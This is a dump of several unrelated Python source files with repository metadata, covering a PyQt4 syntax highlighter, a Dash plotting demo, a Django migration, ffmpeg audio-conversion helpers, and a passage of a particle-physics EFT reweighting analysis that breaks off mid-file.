from PyQt4.QtCore import QRegExp
from PyQt4.QtGui import QColor,QTextCharFormat,QFont,QSyntaxHighlighter
def format(color, style=''):
    """Build a QTextCharFormat with the given color name and optional style.

    ``style`` may contain 'bold' and/or 'italic'.
    NOTE: the name shadows the builtin ``format``; kept because the STYLES
    table below calls it by this name.
    """
    fg = QColor()
    fg.setNamedColor(color)
    char_format = QTextCharFormat()
    char_format.setForeground(fg)
    if 'bold' in style:
        char_format.setFontWeight(QFont.Bold)
    if 'italic' in style:
        char_format.setFontItalic(True)
    return char_format
# Token-category -> QTextCharFormat lookup used by PythonHighlighter below.
# Built once at import time via the local format() helper.
STYLES = {
    'keyword': format('blue'),
    'operator': format('darkred'),
    'brace': format('cyan','bold'),
    'defclass': format('green', 'bold'),
    'string': format('darkGreen'),
    'string2': format('darkMagenta'),
    'comment': format('Grey', 'italic'),
    'self': format('black', 'italic'),
    'numbers': format('darkMagenta'),
}
class PythonHighlighter(QSyntaxHighlighter):
    """Regex-based syntax highlighter for Python source in a QTextDocument."""

    # BUG FIX: the original lists were missing commas at several line ends,
    # which silently concatenated adjacent string literals ("continue"+"from"
    # -> "continuefrom", "range"+"join" -> "rangejoin", "is"+"\\^" -> "is\\^"),
    # so those words were never highlighted and bogus tokens were matched.
    keywords = [
        "open", "close", "elif", "if", "for", "while", "break", "continue",
        "from", "import", "as", "range",
        "join", "lambda",
        "sum", "max", "min", "return",
        "def", "class", "print", "eval", "exec", "global",
    ]

    operators = [
        "and", "in", "or", "not", "is",
        "\\^", "=", ">=", ">",
        "<=", "<",
    ]

    braces = [
        '\{', '\}', '\(', '\)', '\[', '\]',
    ]

    def __init__(self, document):
        QSyntaxHighlighter.__init__(self, document)
        # Assemble (pattern, capture-group, format) rules; group 0 is the
        # whole match, group 1 is used for def/class names.
        rules = []
        rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
                  for w in PythonHighlighter.keywords]
        rules += [(r'\b%s\b' % o, 0, STYLES['operator'])
                  for o in PythonHighlighter.operators]
        rules += [(r'%s' % b, 0, STYLES['brace'])
                  for b in PythonHighlighter.braces]
        rules += [
            (r'\bself\b', 0, STYLES['self']),
            # Single- and triple-quoted strings (both quote styles).
            (r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
            (r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
            (r'"{3}[\s\S]*?"{3}', 0, STYLES['string']),
            (r"'{3}[\s\S]*?'{3}", 0, STYLES['string']),
            # Highlight the name following def/class (capture group 1).
            (r'\bdef\b\s*(\w+)', 1, STYLES['defclass']),
            (r'\bclass\b\s*(\w+)', 1, STYLES['defclass']),
            (r'#[^\n]*', 0, STYLES['comment']),
            # Integer, hex and float literals.
            (r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
            (r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
            (r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b', 0, STYLES['numbers']),
        ]
        self.rules = [(QRegExp(pat), index, fmt)
                      for (pat, index, fmt) in rules]

    def highlightBlock(self, text):
        """Apply every rule's format to each of its matches in *text*."""
        for expression, nth, format in self.rules:
            index = expression.indexIn(text, 0)
            while index >= 0:
                index = expression.pos(nth)
                length = len(expression.cap(nth))
                self.setFormat(index, length, format)
                index = expression.indexIn(text, index + length)
        self.setCurrentBlockState(0)
"zhangh40@msu.edu"
] | zhangh40@msu.edu |
8a66309cef71bfec55cfda5a309e8111dc4d5640 | a25e73dad4794f13fa8c77567d8b628875d9e252 | /ex1.py | ac3151b24d5332824f9c179fd6e1a8ff437ed017 | [
"MIT"
] | permissive | alhaol/dash-svm | e77dc1aab6fefb26fae5a7d172eb4720bba562fb | 0b4ce502be6b5d026049dfe4f9e41cbc65815e42 | refs/heads/master | 2020-04-26T05:29:28.777021 | 2019-05-10T18:48:09 | 2019-05-10T18:48:09 | 173,335,823 | 0 | 0 | null | 2019-03-01T16:40:19 | 2019-03-01T16:40:19 | null | UTF-8 | Python | false | false | 1,453 | py |
import dash
import dash_core_components as dcc
import dash_html_components as html
app = dash.Dash()


def _make_graph(graph_id, bar_y):
    """Build a dcc.Graph with a fixed line trace and a configurable bar trace.

    Factored out because the three figures below were copy-pasted and differed
    only in their element id and the bar trace's y-values.
    """
    return dcc.Graph(
        id=graph_id,
        figure={
            'data': [
                {'x': [1, 2, 3, 4, 5], 'y': [9, 6, 2, 1, 5], 'type': 'line', 'name': 'Boats'},
                {'x': [1, 2, 3, 4, 5], 'y': bar_y, 'type': 'bar', 'name': 'Cars'},
            ],
            'layout': {
                'title': 'Basic Dash Example'
            }
        }
    )


# Same public names, ids and figure contents as before (Fig2/Fig3 are identical).
Fig1 = _make_graph('fig1', [8, 7, 2, 7, 3])
Fig2 = _make_graph('fig2', [8, 7, 0, 7, 0])
Fig3 = _make_graph('fig3', [8, 7, 0, 7, 0])

app.layout = html.Div(children=[
    html.H1(children='Dash Tutorials'),
    Fig1,
    Fig2,
    Fig3
])

# Running the server
if __name__ == '__main__':
    app.run_server(debug=True, host='0.0.0.0', port='7777')
"ibrahim.abualhaol@larus.com"
] | ibrahim.abualhaol@larus.com |
fda997527f91121c4f1bffd1b3f2b0ddcc3dc4fa | 1d7eec692553afc411ec1e7325634f71a2aed291 | /backend/curriculum_tracking/migrations/0007_auto_20200710_1319.py | 9c49a0b43cc247004d1e90d0e0992ef9482c6d27 | [] | no_license | Andy-Nkumane/Tilde | a41a2a65b3901b92263ae94d527de403f59a5caf | 80de97edaf99f4831ca8cb989b93e3be5e09fdd6 | refs/heads/develop | 2023-05-09T10:02:41.240517 | 2021-05-28T09:20:51 | 2021-05-28T09:20:51 | 299,501,586 | 0 | 0 | null | 2020-10-25T22:37:30 | 2020-09-29T04:10:48 | Python | UTF-8 | Python | false | false | 1,043 | py | # Generated by Django 2.1.5 on 2020-07-10 13:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add per-review-request code-review counters to RecruitProject."""

    dependencies = [
        ('curriculum_tracking', '0006_auto_20200701_0539'),
    ]

    operations = [
        # Four integer counters tracking review outcomes accumulated since the
        # last review request, all defaulting to 0 for existing rows.
        migrations.AddField(
            model_name='recruitproject',
            name='code_review_competent_since_last_review_request',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='recruitproject',
            name='code_review_excellent_since_last_review_request',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='recruitproject',
            name='code_review_ny_competent_since_last_review_request',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='recruitproject',
            name='code_review_red_flag_since_last_review_request',
            field=models.IntegerField(default=0),
        ),
    ]
| [
"sheena.oconnell@gmail.com"
] | sheena.oconnell@gmail.com |
966665af55225f40fdd4da19c28dd883a43f62ff | 3c8bc614c9f09db5efce54af3cbcaf78e0f48b54 | /0x0B-python-input_output/4-append_write.py | e5256329fd3346953966d0bb9bdd0fec8b45629c | [] | no_license | davidknoppers/holbertonschool-higher_level_programming | 7848d301c4bf5c1fa285314392adfb577d6d082f | beaf6e5ece426c2086f34763e50c3ce0f56923ac | refs/heads/master | 2021-04-29T10:10:27.071278 | 2017-05-03T02:46:44 | 2017-05-03T02:46:44 | 77,847,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | #!/usr/bin/python3
"""
One function in this module
append_write opens a file and appends some text to it
"""
def append_write(filename="", text=""):
"""
open file
put some text at the end of it
close that file
"""
with open(filename, mode='a', encoding="utf-8") as myFile:
chars_written = myFile.write(text)
return chars_written
| [
"david.knoppers@holbertonschool.com"
] | david.knoppers@holbertonschool.com |
b3d0865a0cf9592cde62d1e601c04c26b3042079 | 29d64db8494161a0c9cb223992d44f7bd201b104 | /utils.py | 2b1012d2fe560f8779a17dad36372d6cbc84d015 | [] | no_license | marakhmusic/Environment-Detection-using-audio | 2b8b33a651a273ed69fb798a549be2327a010755 | b44026f1415f73d7dd17e8385fc99e5afe03fd24 | refs/heads/main | 2023-01-03T05:44:18.708724 | 2020-10-15T13:36:19 | 2020-10-15T13:36:19 | 304,333,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,642 | py |
from subprocess import PIPE, Popen, run
def convert_to_PCM(file, out_Fs=44100):
    """Decode an audio file object to raw s16le PCM bytes via ffmpeg.

    *file* must be a real OS-level file object (it is used as the child
    process's stdin). Returns the raw PCM bytes at *out_Fs* Hz.
    NOTE(review): ffmpeg's stderr is captured but discarded — failures return
    empty bytes silently.
    """
    cmd = ['ffmpeg', '-i', '-', '-f', 's16le', '-ar', str(out_Fs), 'pipe:1' ]
    process = Popen(cmd, stdin=file, stdout=PIPE, stderr=PIPE)
    # communicate() drains stdout/stderr and waits for ffmpeg to exit.
    output, error = process.communicate()
    #print(output)
    #print(error)
    return output
def save_as_wav(pcm_data, out_file='out.wav', out_Fs= 44100, output=False):
    """Write raw s16le PCM bytes to *out_file* as WAV via ffmpeg.

    pcm_data is piped to ffmpeg's stdin; *out_Fs* is the sample rate of the
    input data. When *output* is truthy the subprocess result is echoed.
    """
    print(f'saving pcm data as {out_file}')
    args = ['ffmpeg',
            '-y',
            '-f',
            's16le',
            '-ar',
            str(out_Fs),
            '-i',
            '-',
            out_file
            ]
    process = run(args, input=pcm_data, stderr=PIPE, stdout=PIPE)
    if output:
        print(f'process return code: {process.returncode}')
        print(process.stdout)
        print(process.stderr)
        print(f'recording has been saved by the name of {out_file}!')
    #print('output', output)
def save_file_as_wav(file, out_name, output=True):
    """Re-encode an audio file object to a 44.1 kHz WAV named *out_name*.

    *file* is used as ffmpeg's stdin, so it must be a real OS-level file
    object. Returns the *output* flag (not the converted data).
    """
    print('saving file as ', out_name)
    args = ['ffmpeg',
            '-y',
            '-i', '-',
            '-ar', '44100',
            out_name]
    #process = Popen(args, stdin=file, stdout=PIPE, stderr=PIPE)
    process = run(args, stdin=file, stdout=PIPE, stderr=PIPE)
    if output:
        print(f'process return code: {process.returncode}')
        print(process.stdout)
        print(process.stderr)
        print(f'recording has been saved by the name of {out_name}!')
    return output
def s(pcm_data, out_file='out.wav', output=True):
    """Save a numpy-like PCM buffer (has .tobytes()) as a mono WAV via ffmpeg.

    NOTE(review): near-duplicate of save_as_wav(), but takes an array instead
    of raw bytes and forces mono output — consider consolidating.
    """
    print(f'saving {out_file} file')
    cmd = ['ffmpeg',
           '-y', # override if the file already exists
           '-f', 's16le', # input format s16le
           "-acodec", "pcm_s16le", # raw pcm data s16 little endian input
           '-i', '-', # pipe input
           '-ac', '1', # mono
           out_file] # out file name
    if output:
        print(f'cmd: {cmd}')
    process = run(cmd, input=pcm_data.tobytes(), stdout=PIPE, stderr=PIPE)
    if output:
        print(f'process return code: {process.returncode}')
        print(process.stdout)
def get_PCM(file, output=False):
    """Decode audio *file* bytes to raw s16le PCM at 44.1 kHz via ffmpeg.

    Unlike convert_to_PCM(), *file* here is passed as the ``input=`` bytes of
    subprocess.run, so it should be the file's raw byte content, not a file
    object. Returns ffmpeg's stdout (the PCM stream).
    """
    print('geting PCM data')
    args = [ 'ffmpeg',
            '-i',
            '-',
            '-f',
            's16le',
            '-ar',
            '44100',
            '-']
    process = run(args, input=file, stdout=PIPE, stderr=PIPE)
    if output:
        print(f'process return code: {process.returncode}')
        print(process.stdout)
    return process.stdout
| [
"noreply@github.com"
] | marakhmusic.noreply@github.com |
2c8a949f713cf95a9d66b2fcd2acc3e0cc636397 | 20374a973fa916c705e3de1bfcffcab0c4e8fa29 | /df_ana.py | 9efa63038da37542c6a111884f6c3241ca1b9400 | [] | no_license | Bryancaraway/EFT_Analyzer | 7a4905daaf6b3f8b91dea0bc4cd235349d9ea87a | 97fd053e9b2872df54f50130408ee9fffaafd135 | refs/heads/master | 2023-06-27T22:23:12.878027 | 2020-08-16T21:36:58 | 2020-08-16T21:36:58 | 288,027,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,285 | py | import sys
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
def main():
    """Exploratory EFT reweighting study: load pickled weights, plot weight
    scaling vs Wilson coefficients, and fit the quadratic beta parametrization.

    Reads aux_EFT.pkl (WC values per reweight point) and eventInfo_EFT.pkl
    (per-event EFT weights + kinematics) from the working directory; writes
    per-WC plots to pdf/.
    """
    aux_df = pd.read_pickle('aux_EFT.pkl')
    df = pd.read_pickle('eventInfo_EFT.pkl')
    bins = np.arange(0,1050,50)
    # Clip H pt into the histogram range; repeat x3 so one hist call can take
    # three weight columns at once.
    h_pt = np.clip(df['H_pt'].to_numpy(), bins[0], bins[-1])
    h_pt = np.repeat(h_pt[:,np.newaxis],3,axis=1)
    #print(df)
    #print(aux_df)
    #print(df)
    # Last reweight point is taken to be the SM point (EFTrwgt183).
    sm = aux_df.index.values[-1]
    def plotWCvsWgt(wc_str):
        # Scatter of one event's EFT/SM weight ratio vs the WC value of each
        # reweight point.
        f_x = aux_df.sort_values(by=wc_str)[wc_str]
        #
        row1 = df.filter(regex=r'EFTrwgt\d+').iloc[0]
        x = row1/row1['EFTrwgt183']
        #
        fx_df = pd.concat([f_x,x],axis='columns')
        plt.scatter(y=fx_df.iloc[:,1], x=fx_df.loc[:,wc_str])
        plt.axhline(1, color='r')
        plt.ylim(0)
        plt.grid(True)
        plt.title(wc_str)
        plt.xlabel(f'WC {wc_str} ')
        plt.ylabel('EFT/SM (weight)' )
        plt.show()
    #
    #plotWCvsWgt('ctZ')
    #
    def giveHiLoWC(wc_str):
        # Reweight-point labels with the highest / lowest value of this WC.
        hi = aux_df.sort_values(by=wc_str , ascending=False).index.values[0]
        lo = aux_df.sort_values(by=wc_str , ascending=True) .index.values[0]
        return hi, lo
    def plot_EFT_scale(wc_str):
        # Overlay H pt at the extreme WC points against the SM point.
        hi, lo = giveHiLoWC(wc_str)
        #
        w_hi, w_lo, w_sm = df[hi], df[lo], df[sm]
        plt.hist(h_pt,
                 histtype='step',
                 bins=bins,
                 weights=[w_hi,w_lo,w_sm],
                 label=[(lambda x : '{0} = {1:5.3f}'.format(wc_str,aux_df.loc[x,wc_str]))(y) for y in [hi,lo,sm]])#str(aux_df.loc[hi,wc_str]),str(aux_df.loc[lo,wc_str]),str(aux_df.loc[sm,wc_str])])
        plt.title(wc_str)
        plt.xlabel('GEN H pt (GeV)')
        plt.grid(True)
        plt.xlim(bins[0],bins[-1])
        plt.legend()
        plt.savefig('pdf/{}.pdf'.format(wc_str))
        #plt.show()
        plt.clf()
    #
    eft_wc = ( # all 16 considered WC
        'ctW', 'ctp', 'cpQM', 'ctli', 'cQei', 'ctZ', 'cQlMi', 'cQl3i', 'ctG', 'ctlTi', 'cbW', 'cpQ3', 'ctei', 'cpt', 'ctlSi', 'cptb'
    )
    eft_hb_wc = ( # two heavy + boson Wilson Coefficients
        'ctp', 'cpQM', 'cpQ3', 'cpt', 'cptb', 'ctW', 'ctZ', 'cbW', 'ctG'
    )
    eft_2l_wc = ( # two heavy + two lepton Wilson Coefficients
        'cQl3i', 'ctli', 'cQei', 'cQlMi', 'ctlTi', 'ctei', 'ctlSi'
    )
    for wc in eft_hb_wc:
        plot_EFT_scale(wc)
    def computeBeta():
        # Least-squares fit of the per-event quadratic weight parametrization
        # w(c) = beta0 + sum_i beta_i c_i + sum_ij beta_ij c_i c_j.
        # NOTE(review): 184 points / 16 WCs are hard-coded here — confirm they
        # match the pickled inputs.
        # taken from Jon's code
        # Build the experiment matrix
        x =[np.ones(184)]
        count = 0
        for i in range(16):
            for j in range(i+1):
                count+=1
                print(count, i , j)
                x.append(aux_df.iloc[:,i].values * aux_df.iloc[:,j].values)
            count+=1
            print(count,i)
            #if (i == 0 ): print( count, aux_df.iloc[:,i])
            x.append(aux_df.iloc[:,i].values)
        x = np.matrix(x).T
        # Build the result matrix y
        y = np.asmatrix(df.iloc[:,:-3].to_numpy()).T
        # Compute beta matrix
        beta = ((x.T * x).I * x.T * y).A
        return beta, x, y
    beta, x, y = computeBeta()
    print(list(map(lambda _: _.shape, [beta, x, y])))
    print(aux_df.columns[0])
    # Quadratic weight for the first WC only: beta rows are [SM, c0^2, c0, ...].
    w_c0 = lambda c : beta[1]*c*c + beta[2]*c + beta[0]
    plt.hist(h_pt,
             histtype='step',
             bins=bins,
             weights=[w_c0(1)/np.sum(w_c0(1)),w_c0(-1)/np.sum(w_c0(-1)),beta[0]/np.sum(beta[0])],
             density=True,
             label=[f'{aux_df.columns.values[0]} = 1',f'{aux_df.columns.values[0]} = -1', 'SM'])
    plt.yscale('log')
    plt.xlim(0)
    plt.legend()
    plt.show()
def get_root_hist(roofile):
    """Sum all histograms in a ROOT file and rebin into 4 normalized bins.

    Returns the 4-bin content as fractions of the total.
    NOTE(review): GetBinContent(j+1) for j in range(NbinsX+1) walks bins
    1..NbinsX+1, i.e. it includes the overflow bin — confirm that is intended.
    """
    from ROOT import TFile, TH1F
    f = TFile(roofile,'READ')
    hist_content = []
    for i in f.GetListOfKeys():
        hist = i.ReadObj()
        hist_content.append([hist.GetBinContent(j+1) for j in range(hist.GetNbinsX()+1)])
    hist_content = np.array(hist_content)
    # Sum over all histograms in the file, bin by bin.
    hist_content = np.sum(hist_content, axis=0)
    # Merge fine bins into the 4 analysis bins (0-4, 4-6, 6-8, 8+).
    hist_binned = [np.sum(hist_content[0:4]),np.sum(hist_content[4:6]), np.sum(hist_content[6:8]), np.sum(hist_content[8:])]
    return hist_binned/np.sum(hist_binned)
class EFT_DC_Prep:
    """Fit and plot the quadratic EFT weight parametrization, and export the
    per-bin P/Q/R coefficients used for datacard preparation."""

    # Binnings for GEN-level kinematics; the coarse lists get clipped so the
    # last bin is inclusive of overflow.
    gen_bins = {
        'pt': np.arange(0,1050,50),
        '400inc': [0,200,300,400,500],
        '300inc': [0,200,300,400]
    } # this will be clipped, i.e 400 - inf
    # Datacard bin labels; 'HZ' is substituted with the particle name.
    gen_bins_labels = {
        '400inc': ['tt_HZ_bin1','tt_HZ_bin2','tt_HZ_bin3','tt_HZ_bin4'],
        '300inc': ['tt_HZ_bin1','tt_HZ_bin2','tt_HZ_bin3']
    }
    # heavy flavour + boson: 'ctp', 'cpQM', 'cpQ3', 'cpt', 'cptb', 'ctW', 'ctZ', 'cbW', 'ctG'
    # 2 sigma interval (sm) for AN2019_011
    an2019_11 = {
        'ctp' : [-14.12,-1.48,32.30,44.48],
        'cpQM': [-3.45,3.33],
        'cpQ3': [-7.21,2.25],
        'cpt' : [-20.91,-14.10,-6.52,4.24],
        'cptb': [-9.87, 9.67],
        'ctW' : [-2.15,-0.29,0.21,1.96],
        'ctZ' : [-2.14,2.19],
        'cbW' : [-4.12,4.09],
        'ctG' : [-1.26,-0.69,0.08,0.79]
    }
    def __init__(self, part, aux_file, wgt_file, eft_params):
        """part: particle tag ('H'/'Z'); aux_file: WC values per reweight
        point; wgt_file: per-event weights + GEN kinematics; eft_params:
        tuple of WC names to fit."""
        self.part = part
        self.aux_df = pd.read_pickle(aux_file)
        # Keep only the reweight-point weight columns, in aux-index order.
        self.wgt_df = pd.read_pickle(wgt_file).loc[:,self.aux_df.index.values]
        self.gen_df = pd.read_pickle(wgt_file).filter(regex=r'[HZ]_\w+') # will need to generalize
        self.eft = eft_params
        self.beta = self.compute_beta()
    def compute_beta(self):
        """Least-squares fit of per-event weights to the quadratic form
        w(c) = SM + sum_i b_i c_i + sum_{i<=j} b_ij c_i c_j.

        Returns a DataFrame with one row per event and one column per term
        ('SM', 'ci', 'ci_cj')."""
        # taken from Jon's code
        # Build the experiment matrix
        x =[np.ones(len(self.aux_df.index.values))]
        beta_cols = ['SM']
        for i in range(len(self.aux_df.columns.values)):
            for j in range(i+1):
                x.append(self.aux_df.iloc[:,i].values * self.aux_df.iloc[:,j].values)
                beta_cols.append(f'{self.aux_df.columns.values[i]}_{self.aux_df.columns.values[j]}')
            x.append(self.aux_df.iloc[:,i].values)
            beta_cols.append(f'{self.aux_df.columns.values[i]}')
        x = np.matrix(x).T
        # Build the result matrix y
        y = np.asmatrix(self.wgt_df.to_numpy()).T
        # Compute beta matrix
        beta = ((x.T * x).I * x.T * y).A
        return pd.DataFrame(data = beta.T, columns=beta_cols)
    def plot_all_eft_scale(self, k_type='pt', opt='all', tag=None):
        """For every fitted WC, plot the kinematic spectrum at the AN2019_011
        interval endpoints against SM, plus an EFT/SM ratio panel; all figures
        are then saved into one PDF under pdf/.

        opt: 'all' = full quadratic weight, 'q' = linear term + SM,
        'p' = quadratic term + SM.
        NOTE(review): the bin-center arithmetic below assumes
        gen_bins[k_type] is an ndarray (true for 'pt'); the list-valued
        binnings would concatenate instead — confirm before using them here.
        """
        kinem = np.clip(self.gen_df[self.part+'_'+k_type], self.gen_bins[k_type][0], self.gen_bins[k_type][-1])
        #h_SM, bins = np.histogram(kinem, bins=self.gen_bins[k_type], weights=self.beta['SM'])
        #for i, row in
        eft_calc_opt = {'all':self.calc_eft_weight,
                        'q': (lambda x,y,z: self.calc_eft_weight_Q(x,y,z) + self.beta['SM']),
                        'p': (lambda x,y,z: self.calc_eft_weight_P(x,y,z) + self.beta['SM'])}
        w_SM = self.beta['SM']
        for param in self.eft:
            #w_eft = [eft_calc_opt[opt]({param:i}, kinem, k_type) for i in [-1,1]]
            w_eft = [eft_calc_opt[opt]({param:i}, kinem, k_type) for i in self.an2019_11[param]]
            fig, (ax,ax2) = plt.subplots(2,1, sharex=True, gridspec_kw={'height_ratios':[3,1]})
            fig.subplots_adjust(hspace=0.0)
            n, bins,_ = ax.hist([kinem for i in range(len(w_eft)+1)],
                                #[kinem,kinem,kinem],
                                bins=self.gen_bins[k_type],
                                histtype='step',
                                weights = w_eft+[w_SM],#[w_eft[0],w_eft[1],w_SM],
                                #label=np.append([param +'='+str(i) for i in [-1,1]],'SM'))
                                label=np.append([param +'='+str(i) for i in self.an2019_11[param]],'SM'))
            ax.set_yscale('log')
            ax.set_ylabel('Events')
            bin_c = (self.gen_bins[k_type][1:]+self.gen_bins[k_type][:-1])/2
            bin_w = (self.gen_bins[k_type][1:]-self.gen_bins[k_type][:-1])
            # Ratio panel: each EFT curve over the SM curve (last entry).
            for i in range(len(n)-1):
                ax2.errorbar(x=bin_c, xerr=bin_w/2,
                             y=n[i]/n[-1],
                             fmt='.')
            #ax2.errorbar(x=bin_c, xerr=bin_w/2,
            #             y=n[1]/n[2],
            #             fmt='.')
            ax2.axhline(1, color='k', linewidth='1', linestyle='--', dashes=(4,8), snap=True)
            ax2.set_ylim(.5,1.5)
            ax2.set_ylabel('EFT/SM')
            plt.xlim(self.gen_bins[k_type][0],self.gen_bins[k_type][-1])
            plt.xlabel(f'GEN {self.part} pt [GeV]')
            ax.legend()
            plt.show()
            #plt.close(fig)
        #
        import matplotlib.backends.backend_pdf as matpdf
        pdf = matpdf.PdfPages(f"pdf/{self.part}_WC_calc{opt}{'' if tag is None else '_'+tag}.pdf")
        for fig_ in range(1, plt.gcf().number+1):
            pdf.savefig( fig_ )
        pdf.close()
        plt.close('all')
    def plot_xsec_eft_scale(self, tag=None):
        """Scan each WC across its AN2019_011 interval and plot the total
        cross-section ratio (sum of EFT weights over sum of SM weights)."""
        w_SM = self.beta['SM']
        n_bins = 50
        for param in self.eft:
            low_edge, hi_edge, step = self.an2019_11[param][0], self.an2019_11[param][-1], (self.an2019_11[param][-1]-self.an2019_11[param][0])/n_bins
            x = np.arange(low_edge, hi_edge+step,step)
            # kinem is irrelevant for the total, so calc_eft_weight's default
            # (None) is used here.
            y = [np.sum(self.calc_eft_weight({param: i}))/np.sum(w_SM) for i in x]
            plt.figure()
            plt.plot(x, y, label=f'{param}')
            plt.xlabel(f'{param} value')
            plt.ylabel('xsec ratio (EFT/SM)')
            plt.ylim(0.5, 1.5)
            plt.title(f'xsec ratio vs WC {param}')
            #plt.legend()
            #plt.show()
            #plt.clf()
        import matplotlib.backends.backend_pdf as matpdf
        pdf = matpdf.PdfPages(f"pdf/{self.part}_WC_xsec_ratio{'' if tag is None else '_'+tag}.pdf")
        for fig_ in range(1, plt.gcf().number+1):
            pdf.savefig( fig_ )
        pdf.close()
        plt.close('all')
    def plot_eft_scale(self, eft_dict, k_type='pt'):
        """Plot the kinematic spectrum for one explicit WC setting vs SM.

        eft_dict maps WC name -> value, e.g. {'ctZ': 1.0}."""
        kinem = np.clip(self.gen_df[self.part+'_'+k_type], self.gen_bins[k_type][0], self.gen_bins[k_type][-1])
        #h_SM, bins = np.histogram(kinem, bins=self.gen_bins[k_type], weights=self.beta['SM'])
        #for i, row in
        w_SM = self.beta['SM']
        w_eft = self.calc_eft_weight(eft_dict, kinem, k_type)
        #print(w_SM,w_eft)
        print(w_eft)
        plt.hist([kinem,kinem],
                 bins=self.gen_bins[k_type],
                 histtype='step',
                 weights = [w_eft,w_SM],
                 label=np.append([k +'='+str(eft_dict[k]) for k in eft_dict],'SM'))
        #plt.yscale('log')
        plt.xlim(self.gen_bins[k_type][0],self.gen_bins[k_type][-1])
        plt.legend()
        plt.show()
    def calc_eft_weight_P(self, eft_dict, kinem=None, k_type=None):
        """Quadratic piece: sum_{i,j} beta_ij * c_i * c_j (kinem unused)."""
        p = np.sum([self.beta[k1+'_'+k2]*v1*v2\
            for k1,v1 in eft_dict.items() for k2,v2 in eft_dict.items()], axis=0)
        return p
    def calc_eft_weight_Q(self, eft_dict, kinem=None, k_type=None):
        """Linear piece: sum_i beta_i * c_i (kinem unused)."""
        q = np.sum([self.beta[k]*v\
            for k,v in eft_dict.items()], axis=0)
        return q
    def calc_eft_weight(self, eft_dict, kinem=None, k_type=None):
        """Full per-event weight P + Q + SM for the given WC values."""
        p = self.calc_eft_weight_P(eft_dict,kinem,k_type)
        q = self.calc_eft_weight_Q(eft_dict,kinem,k_type)
        r = self.beta['SM']
        #print(p,q,r)
        return p + q + r
    def create_dc_Df(self, inc='400inc'):
        """Sum the beta coefficients per pt bin, normalize by the SM column,
        and pickle the P/Q/R table plus the min/max scanned WC values.

        NOTE(review): the binning is hard-coded to gen_bins['400inc'] while
        the labels use *inc* — passing inc='300inc' would mismatch; verify.
        """
        pt_dist = np.clip(self.gen_df[self.part+'_pt'], self.gen_bins['400inc'][0],self.gen_bins['400inc'][-1])
        pqr_df = self.beta.groupby(
            pd.cut(pt_dist,self.gen_bins['400inc'], labels=list(map((lambda x : x.replace('_HZ_', self.part)), self.gen_bins_labels[inc])))
        ).sum()
        #
        # Keep SM, the linear terms, and both orderings of the cross terms.
        pqr_list = ['SM'] + list(self.eft) + \
                   list(set([self.eft[i]+'_'+self.eft[j] for i in range(len(self.eft)) for j in range(i,len(self.eft))] +\
                            [self.eft[j]+'_'+self.eft[i] for i in range(len(self.eft)) for j in range(i,len(self.eft))]))
        pqr_df = pqr_df.filter(items=pqr_list, axis='columns')
        pqr_df = pqr_df.divide(pqr_df['SM'], axis='rows')
        #
        wc_min_max = pd.DataFrame({key:[self.aux_df[key].min(), self.aux_df[key].max()] for key in self.aux_df.filter(items=self.eft).columns}, index=pd.CategoricalIndex(['min','max']))
        #
        pqr_df.to_pickle('pqr_df_'+self.part+'.pkl')
        wc_min_max.to_pickle('wc_minmax_df_'+self.part+'.pkl')
    def getMCshape(self):
        """Histogram the SM-point (EFTrwgt183) pt shape in the '400inc' bins.

        Returns (weighted counts, bin edges, raw unweighted counts)."""
        pt_dist = np.clip(self.gen_df[self.part+'_pt'], self.gen_bins['400inc'][0],self.gen_bins['400inc'][-1])
        h, bins = np.histogram(pt_dist, bins=self.gen_bins['400inc'], weights=self.wgt_df['EFTrwgt183'])
        h_unw, _ = np.histogram(pt_dist, bins=self.gen_bins['400inc'])
        return h,bins, h_unw
    def __getitem__(self,key):
        # Attribute access by string key, e.g. eft['beta'].
        return getattr(self,key)
def plot4Andrew(mc_hist,nd_hist,nd_bins,raw_c):
    """Compare the central MC shape to the custom sample shape.

    mc_hist: normalized 4-bin reference; nd_hist: custom-sample counts
    (normalized in place); raw_c: unweighted counts used for Poisson-style
    relative errors. Top panel: both shapes; bottom: their ratio.
    """
    fig, (ax0,ax1) = plt.subplots(nrows=2)
    # Relative statistical error sqrt(N)/N, scaled onto the normalized shape.
    nd_err = (np.sqrt(raw_c)/raw_c)*nd_hist/np.sum(nd_hist)
    nd_hist = nd_hist/np.sum(nd_hist)
    # Hard-coded bin centers/widths matching the '400inc' binning.
    bins = [100,250,350,450]
    bin_w = [200,100,100,100]
    #
    ax0.bar(bins,mc_hist, width=bin_w, label='MC_central', fill=False, edgecolor='tab:red')
    ax0.bar(bins,nd_hist, width=bin_w, yerr=nd_err, ecolor='tab:blue', label='Custom', fill=False, edgecolor='tab:blue')
    ax1.bar(bins,nd_hist/mc_hist, width=bin_w, yerr=nd_err/mc_hist, ecolor='tab:blue', label='nd/my_sample', fill=False, edgecolor='tab:blue')
    ax0.legend()
    ax0.set_yscale('log')
    ax0.set_ylabel('% of Total')
    ax1.set_ylabel('nd/my_sample')
    ax1.set_ylim(.5,1.5)
    plt.grid(True)
    plt.xlim(0,500)
    plt.show()
if __name__ == '__main__':
    # Script entry: first CLI argument selects the sample ('H' = ttH,
    # 'Z' = ttZ, 'K' = Ken's ttH), then run the fit/plot pipeline.
    #main()
    part = sys.argv[1]
    #
    pklDir = 'pkl_files/'
    aux_file = pklDir+'aux_EFT.pkl'
    #aux_file = pklDir+'aux_EFT_ken_tth.pkl'
    file_dict = {'H': pklDir+'eventInfo_EFT_tth.pkl',
                 'Z': pklDir+'eventInfo_EFT_ttZ.pkl',
                 'K': pklDir+'eventInfo_EFT_ken_tth.pkl'}
    #wgt_file = file_dict['K']
    wgt_file = file_dict[part]
    eft_wc = ( # all 16 considered WC
